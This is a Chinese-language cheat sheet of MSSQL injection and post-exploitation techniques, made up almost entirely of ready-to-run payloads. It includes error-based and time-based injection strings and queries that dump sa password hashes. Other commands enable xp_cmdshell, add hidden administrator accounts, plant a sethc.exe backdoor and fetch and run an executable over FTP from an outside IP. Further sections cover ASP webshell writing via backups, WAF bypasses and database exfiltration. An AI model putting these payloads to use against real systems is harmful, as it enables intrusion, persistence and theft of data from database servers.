关于mssql注入的知识分享

○ 基础

    ◇ 默认数据库

    ◇ 基本结构

    ◇ 注释

    ◇ 系统变量及函数

    ◇ 判断权限

○ sql注入

    ◇ 报错注入

    ◇ insert注入

    ◇ update注入

    ◇ delete注入

    ◇ order by注入

    ◇ group by注入

    ◇ top注入

○ 存储过程

    ◇ 检测是否启用

    ◇ xp_availablemedia

    ◇ xp_enumdsn

    ◇ xp_loginconfig

    ◇ xp_subdirs

    ◇ xp_dirtree

    ◇ xp_regread

    ◇ OPENROWSET/openquery/opendatasource

○ 执行命令

    ◇ xp_cmdshell执行命令

    ◇ SP_OACreate提权

    ◇ xp_regwrite提权

    ◇ jet沙盒

    ◇ public权限提权

    ◇ mssql CLR

    ◇ PowerUpSQL

○ 读写文件

    ◇ 读文件

    ◇ 写文件

    ◇ 绕WAF

○ 备份(脱裤)

    ◇ sqlcmd

    ◇ osql

    ◇ isql

○ 声明

NO.1

master..sysdatabases master 数据库中sysdatabases表   重要字段name(数据库名称) dbid(对应id) filename(数据库文件存放路径)sysobjects表 重要字段name(表名) xtype() type()     syslogins表  重要字段name(用户名) password(密码) sysadmin(true or false)SQL 2005 以后information_schema.tablesinformation_schema 数据库中tables表     重要字段table_catalog(数据库名称) table_name(表名)  table_schema(值such as:dbo)  table_typecolumns表    重要字段table_name(表名) column_name(列名) data_type(字段类型)

host_name()[email protected]@servername

select name,filename from master.dbo.sysdatabasesname数据库名 filename 数据库物理路径

select top 1 name from [数据库名]..syscolumns where name <>'[列名]' and id in (select id from [数据库名]..sysobjects where type='u' and name='[表名]')
select table_name,column_name from information_schema.COLUMNS//table_name表名称 column_name字段名

select top 1 [字段名1] from (select top 1 [字段名1] from [表名] order by [字段名1])T order by [字段名1] desc

select top 1 [数据库]..sysusers.name+'.'+[数据库]..sysobjects.name from [数据库]..sysobjects inner join [数据库]..sysusers on [数据库]..sysobjects.uid=[数据库]..sysusers.uid where [数据库]..sysobjects.xtype in ('u','v') and  [数据库]..sysusers.name+'.'+[数据库]..sysobjects.name not in (select top 0 [数据库]..sysusers.name+'.'+[数据库]..sysobjects.name from [数据库]..sysobjects inner join [数据库]..sysusers on [数据库]..sysobjects.uid=[数据库]..sysusers.uid where [数据库]..sysobjects.xtype in ('u','v'))
//xtype u代表用户自定义的表

SELECT TOP 1 [数据库名]..sysusers.name+'.'+[数据库名]..sysobjects.name FROM [数据库名]..sysobjects INNER JOIN [数据库名]..sysusers ON [数据库名]..sysobjects.uid = [数据库名]..sysusers.uid WHERE [数据库名]..sysobjects.xtype IN ('u','v') ORDER BY [数据库名]..sysusers.name,[数据库名]..sysobjects.name;

select table_name,TABLE_CAtalog,table_schema from information_schema.tablestable_catalog 保存当前数据库名称，table_name 保存当前数据库中所有表

select password from master.dbo.syslogins where name='sa'select sys.fn_VarBinToHexStr(cast(password AS varbinary(256))) from master.dbo.syslogins where name='sa'select master.dbo.fn_VarBinToHexStr(cast(password AS varbinary(256))) from master.dbo.syslogins where name='sa'
select cast(password as binary) from sys.syslogins where name='sa'select parse(password as binary) from sys.syslogins where name='sa'
======SELECT name, LOGINPROPERTY(name, 'PasswordHash' ) hashFROM sysloginsWHERE password IS NOT NULLORDER BY name======select loginproperty('sa','PasswordHash') from syslogins where name='sa'

declare @ID VARCHAR(1000); set @ID='whoami'; exec xp_cmdshell @ID;declare @ID VARCHAR(1000) set @ID=char(119)+char(104)+char(111)+char(97)+char(109)+char(105) exec xp_cmdshell @ID;
DECLARE @pksp VARCHAR(8000);SET @pksp=0x6563686f205e3c25402050616765204c616e67756167653d224a73637269707422255e3e5e3c256576616c28526571756573742e4974656d5b227573225d2c22756e7361666522293b255e3e203e643a5c5c5072696e745c5c46494f415c5c646f73736965725c5c696e6465782e61737078;EXEC master..xp_cmdshell @pksp--

insert into tablename(columnname) exec master.dbo.xp_cmdshell 'whoami';

SELECT * FROM[Master].[dbo].[SYSPROCESSES] WHERE [DBID] IN ( SELECT   [DBID]FROM   [Master].[dbo].[SYSDATABASES]WHERE   NAME='databaseName')=========select * from sys.dm_exec_connectionsselect client_net_address from sys.dm_exec_connections Group BY client_net_addressexec sp_who

select name from [数据库名]..sysobjects where type='u' and id in (select id from [数据库名]..syscolumns where name like '%[列名]%')

/* 注释*/ -- 注释;%00 注释

db_name()   db_name(1)  数据库名host_name()  主机名@@servername 数据库服务器@@version   版本信息user    用户名user_name() 当前用户system_user 系统用户名getdate()   当前时间@@spid  当前进程pidchar(97)        aascii('a')      97Nchar(65)   AUnicode('a')    97Ltrim('   a')   aRtrim('a   ')   aleft('abcdef',2)    abright('abcdef',2)   efreverse('abcd') dcbastuff('abcdefg',2,4,'xxx')  axxxfgreplace('abcdefg','cd','xxx')   abxxxefgquotename('create table')   返回为成为有效的SQL SERVER分隔标识符而添加了分隔符的UNICODE字符串substring('abcdefg',2,3)    bcd

len('0123456789')=10len('为人民服务')=5
sys.fn_VarBinToHexStr() 是把varbinary转换成varcharserver 2012中新增choose(id,'id为1','id为2','id为3')iif(1>2,'真结果','假结果')   类似 2>1?ture:false;

select @@IDENTITY as '标示符';返回最后一次的标识符,如先执行了insert into T_User(user_name,user_password,user_email,user_ip) values('admin','123456','[email protected]','58.20.158.20');返回的将是当前插入的数据的主键U_ID的值

select IS_SRVROLEMEMBER('sysadmin')select IS_MEMBER('db_owner')select IS_MEMBER('public')select HAS_DBACCESS(db_name(1))  //判断是否有数据库访问权限1 = has_perms_by_name(db_name(), 'DATABASE', 'ANY') //判断是否对当前库有所有权限

NO.2

1=quotename(db_name())--1=db_name() %2b'|'--

insert into users values('vk',convert(int,@@version))--,'123')
insert into users values('vk','123' + convert(int,@@version))--')
insert into users values('vk','123') if substring(user,1,1)='d' waitfor delay '0:0:5' else select 2--')

update users set uname='vvvk',upass='11111' where uid=1 and 1=convert(int,@@version)
update users set uname='vvvk',upass='11111'+convert(int,@@version)+'' where uid=1
update users set uname='vvvk',upass='11111' where uid=1  if substring(user,1,1)='d' waitfor delay '0:0:5' else select 2

Delete from users where uid =9+convert(int,@@version)
Delete from users where uid =9 and 1=convert(int,@@version)
Delete from users where uid =9 if substring(user,1,1)='d' waitfor delay '0:0:5' else select 2

select * from users order by uid,convert(int,@@version)select * from users order by uid+convert(int,@@version)select * from users order by uid if substring(user,1,1)='d' waitfor delay '0:0:5' else select 2

(SELECT (CASE WHEN (9637=9637) THEN 4 ELSE 1/(SELECT 0) END))

爆表名：(CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(111)+CHAR(114)+CHAR(113)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST([数据库名]..sysusers.name+CHAR(46)+[数据库名]..sysobjects.name AS NVARCHAR(4000)),CHAR(32))),1,100) FROM [数据库名]..sysobjects INNER JOIN [数据库名]..sysusers ON [数据库名]..sysobjects.uid = [数据库名]..sysusers.uid WHERE [数据库名]..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND ISNULL(CAST([数据库名]..sysusers.name+CHAR(46)+[数据库名]..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP 0 ISNULL(CAST([数据库名]..sysusers.name+CHAR(46)+[数据库名]..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM [数据库名]..sysobjects INNER JOIN [数据库名]..sysusers ON [数据库名]..sysobjects.uid = [数据库名]..sysusers.uid WHERE [数据库名]..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY [数据库名]..sysusers.name+CHAR(46)+[数据库名]..sysobjects.name) ORDER BY [数据库名]..sysusers.name+CHAR(46)+[数据库名]..sysobjects.name)+CHAR(113)+CHAR(119)+CHAR(97)+CHAR(105)+CHAR(113))))
爆列名：(CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(111)+CHAR(114)+CHAR(113)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST([数据库名]..syscolumns.name ASNVARCHAR(4000)),CHAR(32))),1,100) FROM [数据库名]..syscolumns,[数据库名]..sysobjects WHERE [数据库名]..syscolumns.id=[数据库名]..sysobjects.id AND [数据库名]..sysobjects.name=[表名] AND ISNULL(CAST([数据库名]..syscolumns.name AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP 0 ISNULL(CAST([数据库名]..syscolumns.name AS NVARCHAR(4000)),CHAR(32)) FROM [数据库名]..syscolumns,[数据库名]..sysobjects WHERE [数据库名]..syscolumns.id=[数据库名]..sysobjects.id AND [数据库名]..sysobjects.name=[表名] ORDER BY [数据库名]..syscolumns.name) ORDER BY [数据库名]..syscolumns.name)+CHAR(113)+CHAR(119)+CHAR(97)+CHAR(105)+CHAR(113))))

select count(uid),uname from users group by uid,uname union select '1','2'select count(uid),uname from users group by uid,uname,uname+convert(int,@@version)select count(uid),uname from users group by uid,uname if substring(user,1,1)='d' waitfor delay '0:0:5' else select 2

select top 1 @@version,* from usersselect top 0 1 from sysobjects union select @@version--,* from users

NO.3

xp_availablemedia 显示系统上可用的盘符'C:' xp_availablemediaxp_enumgroups 列出当前系统的使用群组及其说明 xp_enumgroupsxp_enumdsn 列出系统上已经设置好的ODBC数据源名称 xp_enumdsnxp_dirtree 显示某个目录下的子目录与文件架构 xp_dirtree 'C:\inetpub\wwwroot\'xp_getfiledetails 获取某文件的相关属性 xp_getfiledetails 'C:\inetpub\wwwroot.asp'dbp.xp_makecab 将目标计算机多个档案压缩到某个档案里所压缩的档案都可以接在参数的后面用豆号隔开dbp.xp_makecab'C:\lin.cab','evil',1,'C:\inetpub\mdb.asp'xp_unpackcab 解压缩 xp_unpackcab 'C:\hackway.cab','C:\temp',1xp_ntsec_enumdomains 列出服务器域名 xp_ntsec_enumdomainsxp_servicecontrol 停止或者启动某个服务 xp_servicecontrol 'stop','schedule'xp_terminate_process 用pid来停止某个执行中的程序 xp_terminate_process 123dbo.xp_subdirs 只列某个目录下的子目录 dbo.xp_subdirs 'C:'

1=(Select count(*) from master..sysobjects where xtype='X' and name='存储过程名称')

exec master.dbo.xp_availablemedia

create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));insert temp exec master.dbo.xp_availablemedia

exec master.dbo.xp_subdirs 'c:\';

insert into temp(id) exec master.dbo.xp_subdirs 'c:\';  //插入临时表

exec master.dbo.xp_dirtree 'c:\';

insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';select id from temp where num1=1; //这里1 是depth深度

1=(select count(*) FROM master..sysobjects where name= 'xp_regread')

create table [dbo].[temptable]([columnname][varchar](8000));DECLARE @result varchar(8000) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into temptable(columnname) values(@result);

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;

insert into OPENROWSET('SQLOLEDB', 'server=ip; uid=user;pwd=123456!', 'select c from cmd') select username from test//把 test是本地表，中username的值 插入到 远程cmd表中的c字段里

exec sp_configure 'Ad Hoc Distributed Queries',0;reconfigure;exec sp_configure 'show advanced options',0;reconfigure;

--创建链接服务器 exec sp_addlinkedserver   'ITSV ', ' ', 'SQLOLEDB ', '远程服务器名或ip地址 ' exec sp_addlinkedsrvlogin 'ITSV ', 'false ',null, '用户名 ', '密码 ' 
--查询示例 select * from ITSV.数据库名.dbo.表名 
--导入示例 select * into 表 from ITSV.数据库名.dbo.表名 
--以后不再使用时删除链接服务器 exec sp_dropserver  'ITSV ', 'droplogins '

--查询示例 select * from openrowset( 'SQLOLEDB ', 'sql服务器名 '; '用户名 '; '密码 ',数据库名.dbo.表名) 
--生成本地表 select * into 表 from openrowset( 'SQLOLEDB ', 'sql服务器名 '; '用户名 '; '密码 ',数据库名.dbo.表名) 
--把本地表导入远程表 insert into openrowset( 'SQLOLEDB ', 'sql服务器名 '; '用户名 '; '密码 ',数据库名.dbo.表名) select * from 本地表 
--更新本地表 update b set b.列A=a.列A from openrowset( 'SQLOLEDB ', 'sql服务器名 '; '用户名 '; '密码 ',数据库名.dbo.表名)as a inner join 本地表 b on a.column1=b.column

--首先创建一个连接创建链接服务器 exec sp_addlinkedserver   'ITSV ', ' ', 'SQLOLEDB ', '远程服务器名或ip地址 ' 
--查询 select * FROM openquery(ITSV,  'SELECT *  FROM 数据库.dbo.表名 ') 
--把本地表导入远程表 insert openquery(ITSV,  'SELECT *  FROM 数据库.dbo.表名 ') select * from 本地表 
--更新本地表 update b set b.列B=a.列B FROM openquery(ITSV,  'SELECT * FROM 数据库.dbo.表名 ') as a  inner join 本地表 b on a.列A=b.列A

SELECT   * FROM   opendatasource( 'SQLOLEDB ',  'Data Source=ip/ServerName;User ID=登陆名;Password=密码 ' ).test.dbo.roy_ta 
--把本地表导入远程表 insert opendatasource( 'SQLOLEDB ',  'Data Source=ip/ServerName;User ID=登陆名;Password=密码 ').数据库.dbo.表名 select * from 本地表

NO.4

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH override;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE WITH override;EXEC sp_configure 'show advanced options', 0;

exec master..xp_cmdshell 'whoami'

SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name ='xp_cmdshell'

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;

exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll'
exec master.dbo.sp_addextendedproc 'xp_cmdshell',’c:\inetput\web\xplog70.dll’; exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll';
无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。） sp_dropextendedproc "xp_cmdshell" sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。) exec sp_dropextendedproc 'xp_cmdshell'exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'

EXEC sp_configure 'show advanced options', 1;  RECONFIGURE WITH OVERRIDE;  EXEC sp_configure 'Ole Automation Procedures', 1;  RECONFIGURE WITH OVERRIDE;  EXEC sp_configure 'show advanced options', 0;

删除drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell'  //删除xp_cmdshell恢复 //DBCC addextendedproc (function_name, dll_name)dbcc addextendedproc ("sp_oacreate","odsole70.dll")   dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

use master  declare @o int  exec sp_oacreate 'wscript.shell',@o out  exec sp_oamethod @o,'run',null,'cmd /c "net user" > d:\2.txt'  
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user dell dell_007 /add' 

declare @o int  exec sp_oacreate 'Shell.Application', @o out  exec sp_oamethod @o, 'ShellExecute',null, 'cmd.exe','cmd /c net user>c:\test.txt','c:\windows\system32','','1';  or  exec sp_oamethod @o, 'ShellExecute',null, 'user.vbs','','c:\','','1';  

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user guest 123 /add & net localgroup administrators guest/add & net localgroup "Remote Desktop Users" guest /add'
declare @shell int exec sp_oacreate 'Shell.Application',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user guest$ 123/add'

declare @o intexec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @o intexec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, '%systemroot%\system32\cmd.exe /c echo open 222.180.210.113 > cmd.txt&echo 123>> cmd.txt&echo123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&1.exe&1.exe&del cmd.txt. /q /f&del 1.exe /f /q'--

declare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_oacreate 'scripting.filesystemobject',@o outexec sp_oamethod @o, 'createtextfile', @f out, 'd:\2.txt', 1exec @ret = sp_oamethod @f, 'writeline', NULL ,'1234567890'exec @ret = sp_oamethod @f, 'close', NULL 

declare @sp_passwordxieo int, @f int, @t int, @ret intexec sp_oacreate 'scripting.filesystemobject', @sp_passwordxieo outexec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'd:\RECYCLER\1.vbs', 1exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","123$")'exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "123"'exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo'exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/123$",user)'exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/123$"'; 

declare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_oacreate 'scripting.filesystemobject',@o outexec sp_oamethod @o, 'opentextfile', @f out, 'd:\2.txt', 1exec @ret = sp_oamethod @f, 'read', @line out,8000select @line

declare @o intexec sp_oacreate 'scripting.filesystemobject',@o outexec sp_oamethod @o, 'deletefile',null,'d:\2.txt'exec sp_OADestroy @o

declare @o intexec sp_oacreate 'scripting.filesystemobject',@o outexec sp_oamethod @o, 'deletefile',null,'d:\2.txt'exec sp_OADestroy @o

declare @aa int  exec sp_oacreate 'scripting.filesystemobject', @aa out  exec sp_oamethod @aa, 'moveFile',null,'c:\temp\ipmi.log', 'c:\temp\ipmi1.log';

DECLARE @js int  EXEC sp_OACreate 'ScriptControl',@js OUT  EXEC sp_OASetProperty @js, 'Language', 'JavaScript'  EXEC sp_OAMethod @js, 'Eval', NULL, 'var o=new ActiveXObject("Shell.Users");z=o.create("user");z.changePassword("pass","");z.setting("AccountType")=3;'  

function deleteFile(name){ var fso=new ActiveXObject("Scripting.FileSystemObject");if(fso.FileExists(name))fso.DeleteFile(name);else return false;}deleteFile("d:\2.txt");

NO.5

create table result(res varchar(8000));bulk insert result from 'c:/windows/temp/123.txt'select * from result

BULK INSERT TFROM 'c:\a.txt'WITH (      FIELDTERMINATOR = '\n', --字段间隔符号      ROWTERMINATOR = '\n\n' --记录间隔符号) 

alert database [dbname] set RECOVERY FULL–create table cmd(a image)–backup log [dbname] to disk='c:\hta' with init–insert into cmd(a) values('[command]')–backup log [dbname] to disk='系统启动目录\hello.hta'–drop table cmd–

backup database [dbname] to disk='c:\db.bak'–create table cmd(cmd image)–insert into cmd(cmd) values('[command]')–backup database [dbname] to disk='系统启动目录\hello.hta' WITH DIFFERENTIAL FORMAT–drop table cmd–

1.完整备份一次(保存位置当然可以改)backup database 库名 to disk = 'c:\ddd.bak';--2.创建表并插入数据create table [dbo].[dtest] ([cmd] [image]);insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--3.进行差异备份backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--上面0x3C25657865637574652872657175657374282261222929253E就是一句话木马的内容：<%execute(request("a"))%>

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE;exec sp_configure 'show advanced options', 0;RECONFIGURE;

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',0;RECONFIGURE;exec sp_configure 'show advanced options', 0;RECONFIGURE;

exec sp_makewebtask 'c:\windows.txt',' select ''<%25execute(request("a"))%25>'' ';

exec sp_makewebtask 'd:\wwwroot\bake.asp','select ''<%execute(request("a"))%>'' ';

%01, %02, %03, %04, %05, %06, %07, %08, %09, %0B, %0C, %0D, %0E, %0F, %0A

declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'

http://target.com/page.aspx?id=union/*postCookie: id=*/from table
id=*/select/*
GPC

union/*，*/select/*，*/from table

NO.6

"C:/Program Files/Microsoft SQL Server/90/Tools/Binn/SQLCMD.EXE" -S ./sqlexpress -U sa -P 000000 -d master -Q"BACKUP DATABASE test to disk='c:/aa/aaa.bak'"

"C:/Program Files/Microsoft SQL Server/90/Tools/Binn/SQLCMD.EXE" -S ./sqlexpress -d master -Q"BACKUP DATABASE test to disk='c:/aa/aaa.bak'"

sqlcmd -S <ComputerName>\<InstanceName> -i <MyScript.sql> -o <MyOutput.rpt>sqlcmd -Q "SELECT * FROM AdventureWorks.Person.Contact" -o MyOutput.txt

"C:/Program Files/Microsoft SQL Server/90/Tools/Binn/SQLCMD.EXE" -S ./sqlexpress -U sa -P 000000 -d master -Q"RESTORE DATABASE test from disk='c:/aa/aaa.bak'"

"C:/Program Files/Microsoft SQL Server/90/Tools/Binn/SQLCMD.EXE" -?Microsoft (R) SQL Server 命令行工具版本 9.00.1399.06 NT INTEL X86版权所有 (c) Microsoft Corporation。保留所有权利。
用法: Sqlcmd            [-U 登录 ID]          [-P 密码]  [-S 服务器]            [-H 主机名]          [-E 可信连接]  [-d 使用数据库名称] [-l 登录超时值]     [-t 查询超时值]  [-h 标题]           [-s 列分隔符]      [-w 屏幕宽度]  [-a 数据包大小]        [-e 回显输入]        [-I 允许带引号的标识符]  [-c 命令结束]            [-L[c] 列出服务器[清除输出]]  [-q "命令行查询"]   [-Q "命令行查询" 并退出]  [-m 错误级别]        [-V 严重级别]     [-W 删除尾随空格]  [-u unicode 输出]    [-r[0|1] 发送到 stderr 的消息]  [-i 输入文件]         [-o 输出文件]        [-z 新密码]  [-f <代码页> | i:<代码页>[,o:<代码页>]] [-Z 新建密码并退出]  [-k[1|2] 删除[替换]控制字符]  [-y 可变长度类型显示宽度]  [-Y 固定长度类型显示宽度]  [-p[1] 打印统计信息[冒号格式]]  [-R 使用客户端区域设置]  [-b 出错时中止批处理]  [-v 变量 = "值"...]  [-A 专用管理连接]  [-X[1] 禁用命令、启动脚本、环境变量[并退出]]  [-x 禁用变量情况]  [-? 显示语法摘要]

"C:/Program Files/Microsoft SQL Server/90/Tools/Binn/Osql.EXE" -S ./sqlexpress -U sa -P 000000 -d master -Q"BACKUP DATABASE test to disk='c:/aa/aaa.bak'"

"C:/Program Files/Microsoft SQL Server/90/Tools/Binn/Osql.EXE" -S ./sqlexpress -U sa -P 000000 -d master -Q"RESTORE DATABASE test from disk='c:/aa/aaa.bak'"

"C:/Program Files/Microsoft SQL Server/90/Tools/Binn/Osql.EXE" /?Microsoft (R) SQL Server 命令行工具版本 9.00.1399.06 NT INTEL X86版权所有 (c) Microsoft Corporation。保留所有权利。
注意: osql 并不支持 SQL Server 2005的所有功能。请使用 sqlcmd。有关详细信息，请参阅 SQL Server 联机丛书。
用法: osql                   [-U 登录 ID]          [-P 密码]  [-S 服务器]                [-H 主机名]           [-E 可信连接]  [-d 使用数据库名称]        [-l 登录超时值]       [-t 查询超时值]  [-h 标题]                  [-s 列分隔符]         [-w 列宽]  [-a 数据包大小]            [-e 回显输入]         [-I 允许带引号的标识符]  [-L 列出服务器]            [-c 命令结束]         [-D ODBC DSN 名称]  [-q "命令行查询"]          [-Q "命令行查询" 并退出]  [-n 删除编号方式]          [-m 错误级别]  [-r 发送到 stderr 的消息]  [-V 严重级别]  [-i 输入文件]              [-o 输出文件]  [-p 打印统计信息]               [-b 出错时中止批处理]  [-X[1] 禁用命令，[退出的同时显示警告]]  [-O 使用旧 ISQL 行为禁用下列项]      <EOF> 批处理      自动调整控制台宽度      宽消息      默认错误级别为 -1 和 1  [-? 显示语法摘要]

"C:/Program Files/Microsoft SQL Server/80/Tools/Binn/Isql.EXE" -S ./sqlexpress -U sa -P 000000 -d master -Q"BACKUP DATABASE test to disk='c:/aa/aaa.bak'"

"C:/Program Files/Microsoft SQL Server/80/Tools/Binn/Isql.EXE" -S ./sqlexpress -U sa -P 000000 -d master -Q"RESTORE DATABASE test from disk='c:/aa/aaa.bak'"

"C:/Program Files/Microsoft SQL Server/80/Tools/Binn/Isql.EXE"/?isql: unknown option ?usage: isql              [-U login id]          [-P password]  [-S server]            [-H hostname]          [-E trusted connection]  [-d use database name] [-l login timeout]     [-t query timeout]  [-h headers]           [-s colseparator]      [-w columnwidth]  [-a packetsize]        [-e echo input]        [-x max text size]  [-L list servers]      [-c cmdend]  [-q "cmdline query"]   [-Q "cmdline query" and exit]  [-n remove numbering]  [-m errorlevel]  [-r msgs to stderr]  [-i inputfile]         [-o outputfile]  [-p print statistics]  [-b On error batch abort]  [-O use Old ISQL behavior disables the following]      <EOF> batch processing      Auto console width scaling      Wide messages      default errorlevel is -1 vs 1  [-? show syntax summary (this screen)]

NO.7